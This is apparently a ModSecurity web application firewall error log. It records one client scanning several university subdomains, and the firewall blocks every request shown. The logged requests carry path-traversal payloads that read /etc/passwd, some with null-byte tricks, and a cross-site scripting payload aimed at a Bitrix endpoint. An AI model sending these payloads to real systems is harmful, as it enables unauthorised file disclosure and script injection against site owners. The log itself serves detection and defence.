[Tue Aug 29 11:57:33.542164 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAArbWccAAAAG"]
[Tue Aug 29 11:57:33.546689 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArdQlEAAAAI"]
[Tue Aug 29 11:57:33.553047 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArh0VsAAAAC"]
[Tue Aug 29 11:57:33.575184 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArLLl8AAAAb"]
[Tue Aug 29 11:57:33.596565 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAArLLmAAAAAb"]
[Tue Aug 29 11:57:33.620431 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16vcCo-f0AAArePOEAAAAJ"]
[Tue Aug 29 11:57:33.638717 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAoz8i0AAAAS"]
[Tue Aug 29 11:57:33.680746 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAAnEqfwAAAAO"]
[Tue Aug 29 11:57:34.662535 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vsCo-f0AAArePOkAAAAJ"]